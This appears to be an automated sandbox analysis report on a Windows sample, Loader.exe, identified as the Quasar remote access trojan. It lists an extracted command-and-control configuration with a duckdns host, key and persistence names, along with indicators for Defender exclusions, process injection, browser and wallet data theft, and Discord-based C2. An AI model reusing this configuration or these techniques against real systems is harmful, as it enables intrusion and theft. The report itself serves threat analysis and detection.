Resubmissions
22-05-2024 16:28
240522-tywmzahb27 10Analysis
-
max time kernel
54s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 16:28
Static task
static1
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Loader.exe
Resource
win10v2004-20240226-en
General
-
Target
Loader.exe
-
Size
24.6MB
-
MD5
0bbe9763f6ca8dde51dceecd8c15bf16
-
SHA1
686df2ce62a32a65ca5e82b0ae3b00b243d3cb43
-
SHA256
e8a3a56be00250fe8894b669c5409d05c50f5f0555039e0572b5056b269f24d9
-
SHA512
631d262a6c434361fc214504540e1c50ea929971c5433724864d8e069028e767e09e2507ab83a9b7554dbb777568bb672ab6f771fc6d9a2c04f2027aa3cd4464
-
SSDEEP
393216:ecTVwTQsEe+NUryAT551+swSSLgNJBoM5lELqwhXwazfb35x08kHHQgDnYF:echw0myATDhOLgfmMU6MfDQlH5nC
Malware Config
Extracted
quasar
1.4.1
barbu
bardu3662.duckdns.org:9733
afa58199-2aae-4e08-8ef4-8e4ef39bc0aa
-
encryption_key
080342EF5ED2B5D16317695CC4327BF2FFC034AA
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
Updater
-
subdirectory
ApplicationFrameHost
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Update.exe family_quasar behavioral2/memory/3200-27-0x0000000000650000-0x0000000000974000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 5944 created 5856 5944 WerFault.exe curl.exe PID 5948 created 4088 5948 WerFault.exe SearchApp.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
svchost.exedescription pid process target process PID 2092 created 4088 2092 svchost.exe SearchApp.exe PID 2092 created 5856 2092 svchost.exe curl.exe PID 2092 created 5536 2092 svchost.exe SearchApp.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 1824 powershell.exe 2648 powershell.exe 488 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
Processes:
SecurityHealthServices.exevmarkghgnurz.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts SecurityHealthServices.exe File created C:\Windows\system32\drivers\etc\hosts vmarkghgnurz.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Loader.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Loader.exe -
Drops startup file 1 IoCs
Processes:
SearchServices.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SearchServices.exe SearchServices.exe -
Executes dropped EXE 6 IoCs
Processes:
R3nzSkin_Injector.exeUpdate.exeSecurityHealthServices.exeSearchServices.exeSearchServices.exevmarkghgnurz.exepid process 1848 R3nzSkin_Injector.exe 3200 Update.exe 4644 SecurityHealthServices.exe 4344 SearchServices.exe 1428 SearchServices.exe 2344 vmarkghgnurz.exe -
Loads dropped DLL 49 IoCs
Processes:
SearchServices.exepid process 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe 1428 SearchServices.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 26 IoCs
Processes:
flow ioc 60 discord.com 76 discord.com 84 discord.com 58 discord.com 59 discord.com 89 discord.com 53 discord.com 75 discord.com 77 discord.com 54 discord.com 57 discord.com 86 discord.com 92 discord.com 55 discord.com 78 discord.com 79 discord.com 87 discord.com 91 discord.com 56 discord.com 81 discord.com 90 discord.com 61 discord.com 82 discord.com 85 discord.com 80 discord.com 88 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 44 api.ipify.org 45 api.ipify.org -
Drops file in System32 directory 5 IoCs
Processes:
svchost.exepowershell.exevmarkghgnurz.exeSecurityHealthServices.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe vmarkghgnurz.exe File opened for modification C:\Windows\system32\MRT.exe SecurityHealthServices.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
SecurityHealthServices.exevmarkghgnurz.exedescription pid process target process PID 4644 set thread context of 4284 4644 SecurityHealthServices.exe dialer.exe PID 2344 set thread context of 3872 2344 vmarkghgnurz.exe dialer.exe PID 2344 set thread context of 4012 2344 vmarkghgnurz.exe dialer.exe PID 2344 set thread context of 3716 2344 vmarkghgnurz.exe dialer.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1136 sc.exe 5528 sc.exe 5484 sc.exe 5392 sc.exe 3628 sc.exe 5008 sc.exe 5500 sc.exe 4104 sc.exe 2992 sc.exe 3252 sc.exe 4520 sc.exe 4072 sc.exe 2400 sc.exe 4640 sc.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\SearchServices.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exewmiprvse.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Modifies registry class 1 IoCs
Processes:
sihost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
SecurityHealthServices.exepowershell.exedialer.exevmarkghgnurz.exepowershell.exepowershell.exewmiprvse.exepid process 4644 SecurityHealthServices.exe 1824 powershell.exe 1824 powershell.exe 1824 powershell.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4284 dialer.exe 4284 dialer.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 4644 SecurityHealthServices.exe 2344 vmarkghgnurz.exe 2648 powershell.exe 2648 powershell.exe 2648 powershell.exe 488 powershell.exe 488 powershell.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4676 wmiprvse.exe 4676 wmiprvse.exe 4676 wmiprvse.exe 4676 wmiprvse.exe 4676 wmiprvse.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 2648 powershell.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 2648 powershell.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe 4284 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3240 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 672 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Update.exeR3nzSkin_Injector.exepowershell.exeSecurityHealthServices.exepowercfg.exepowercfg.exepowercfg.exedialer.exepowershell.exepowercfg.exepowershell.exetasklist.exesvchost.exedescription pid process Token: SeDebugPrivilege 3200 Update.exe Token: SeDebugPrivilege 1848 R3nzSkin_Injector.exe Token: SeDebugPrivilege 1824 powershell.exe Token: SeDebugPrivilege 4644 SecurityHealthServices.exe Token: SeShutdownPrivilege 3840 powercfg.exe Token: SeCreatePagefilePrivilege 3840 powercfg.exe Token: SeShutdownPrivilege 2060 powercfg.exe Token: SeCreatePagefilePrivilege 2060 powercfg.exe Token: SeShutdownPrivilege 3164 powercfg.exe Token: SeCreatePagefilePrivilege 3164 powercfg.exe Token: SeDebugPrivilege 4284 dialer.exe Token: SeDebugPrivilege 488 powershell.exe Token: SeShutdownPrivilege 5084 powercfg.exe Token: SeCreatePagefilePrivilege 5084 powercfg.exe Token: SeDebugPrivilege 2648 powershell.exe Token: SeDebugPrivilege 4612 tasklist.exe Token: SeAssignPrimaryTokenPrivilege 2756 svchost.exe Token: SeIncreaseQuotaPrivilege 2756 svchost.exe Token: SeSecurityPrivilege 2756 svchost.exe Token: SeTakeOwnershipPrivilege 2756 svchost.exe Token: SeLoadDriverPrivilege 2756 svchost.exe Token: SeSystemtimePrivilege 2756 svchost.exe Token: SeBackupPrivilege 2756 svchost.exe Token: SeRestorePrivilege 2756 svchost.exe Token: SeShutdownPrivilege 2756 svchost.exe Token: SeSystemEnvironmentPrivilege 2756 svchost.exe Token: SeUndockPrivilege 2756 svchost.exe Token: SeManageVolumePrivilege 2756 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2756 svchost.exe Token: SeIncreaseQuotaPrivilege 2756 svchost.exe Token: SeSecurityPrivilege 2756 svchost.exe Token: SeTakeOwnershipPrivilege 2756 svchost.exe Token: SeLoadDriverPrivilege 2756 svchost.exe Token: SeSystemtimePrivilege 2756 svchost.exe Token: SeBackupPrivilege 2756 svchost.exe Token: SeRestorePrivilege 2756 svchost.exe Token: SeShutdownPrivilege 2756 svchost.exe Token: SeSystemEnvironmentPrivilege 2756 svchost.exe Token: SeUndockPrivilege 2756 svchost.exe Token: SeManageVolumePrivilege 2756 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2756 svchost.exe Token: SeIncreaseQuotaPrivilege 2756 svchost.exe Token: SeSecurityPrivilege 2756 svchost.exe Token: SeTakeOwnershipPrivilege 2756 svchost.exe Token: SeLoadDriverPrivilege 2756 svchost.exe Token: SeSystemtimePrivilege 2756 svchost.exe Token: SeBackupPrivilege 2756 svchost.exe Token: SeRestorePrivilege 2756 svchost.exe Token: SeShutdownPrivilege 2756 svchost.exe Token: SeSystemEnvironmentPrivilege 2756 svchost.exe Token: SeUndockPrivilege 2756 svchost.exe Token: SeManageVolumePrivilege 2756 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2756 svchost.exe Token: SeIncreaseQuotaPrivilege 2756 svchost.exe Token: SeSecurityPrivilege 2756 svchost.exe Token: SeTakeOwnershipPrivilege 2756 svchost.exe Token: SeLoadDriverPrivilege 2756 svchost.exe Token: SeSystemtimePrivilege 2756 svchost.exe Token: SeBackupPrivilege 2756 svchost.exe Token: SeRestorePrivilege 2756 svchost.exe Token: SeShutdownPrivilege 2756 svchost.exe Token: SeSystemEnvironmentPrivilege 2756 svchost.exe Token: SeUndockPrivilege 2756 svchost.exe Token: SeManageVolumePrivilege 2756 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 3240 Explorer.EXE 3240 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 3240 Explorer.EXE 3240 Explorer.EXE 3240 Explorer.EXE 3240 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exepid process 5308 Conhost.exe 5796 Conhost.exe 6096 Conhost.exe 5372 Conhost.exe 3744 Conhost.exe 6112 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Loader.exeSearchServices.exeUpdate.exeSearchServices.execmd.exeSecurityHealthServices.exedialer.execmd.exelsass.exedescription pid process target process PID 1140 wrote to memory of 488 1140 Loader.exe powershell.exe PID 1140 wrote to memory of 488 1140 Loader.exe powershell.exe PID 1140 wrote to memory of 488 1140 Loader.exe powershell.exe PID 1140 wrote to memory of 1848 1140 Loader.exe R3nzSkin_Injector.exe PID 1140 wrote to memory of 1848 1140 Loader.exe R3nzSkin_Injector.exe PID 1140 wrote to memory of 3200 1140 Loader.exe Update.exe PID 1140 wrote to memory of 3200 1140 Loader.exe Update.exe PID 1140 wrote to memory of 4644 1140 Loader.exe SecurityHealthServices.exe PID 1140 wrote to memory of 4644 1140 Loader.exe SecurityHealthServices.exe PID 1140 wrote to memory of 4344 1140 Loader.exe SearchServices.exe PID 1140 wrote to memory of 4344 1140 Loader.exe SearchServices.exe PID 4344 wrote to memory of 1428 4344 SearchServices.exe SearchServices.exe PID 4344 wrote to memory of 1428 4344 SearchServices.exe SearchServices.exe PID 3200 wrote to memory of 2288 3200 Update.exe schtasks.exe PID 3200 wrote to memory of 2288 3200 Update.exe schtasks.exe PID 1428 wrote to memory of 848 1428 SearchServices.exe cmd.exe PID 1428 wrote to memory of 848 1428 SearchServices.exe cmd.exe PID 3600 wrote to memory of 1304 3600 cmd.exe wusa.exe PID 3600 wrote to memory of 1304 3600 cmd.exe wusa.exe PID 4644 wrote to memory of 4284 4644 SecurityHealthServices.exe dialer.exe PID 4644 wrote to memory of 4284 4644 SecurityHealthServices.exe dialer.exe PID 4644 wrote to memory of 4284 4644 SecurityHealthServices.exe dialer.exe PID 4644 wrote to memory of 4284 4644 SecurityHealthServices.exe dialer.exe PID 4644 wrote to memory of 4284 4644 SecurityHealthServices.exe dialer.exe PID 4644 wrote to memory of 4284 4644 SecurityHealthServices.exe dialer.exe PID 4644 wrote to memory of 4284 4644 SecurityHealthServices.exe dialer.exe PID 1428 wrote to memory of 2860 1428 SearchServices.exe cmd.exe PID 1428 wrote to memory of 2860 1428 SearchServices.exe cmd.exe PID 4284 wrote to memory of 632 4284 dialer.exe winlogon.exe PID 4284 wrote to memory of 684 4284 dialer.exe lsass.exe PID 4284 wrote to memory of 972 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 384 4284 dialer.exe dwm.exe PID 4284 wrote to memory of 528 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 432 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1032 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1056 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1064 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1172 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1224 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1264 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1320 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1368 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1436 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1472 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1484 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1496 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1648 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1696 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1728 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1804 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1840 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1904 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1916 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1972 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 2016 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 1736 4284 dialer.exe spoolsv.exe PID 4284 wrote to memory of 2144 4284 dialer.exe svchost.exe PID 2860 wrote to memory of 4612 2860 cmd.exe tasklist.exe PID 2860 wrote to memory of 4612 2860 cmd.exe tasklist.exe PID 684 wrote to memory of 2720 684 lsass.exe sysmon.exe PID 4284 wrote to memory of 2184 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 2432 4284 dialer.exe sihost.exe PID 4284 wrote to memory of 2440 4284 dialer.exe svchost.exe PID 4284 wrote to memory of 2448 4284 dialer.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:384
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵PID:432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1172
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1436
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1972
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2016
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1736
-
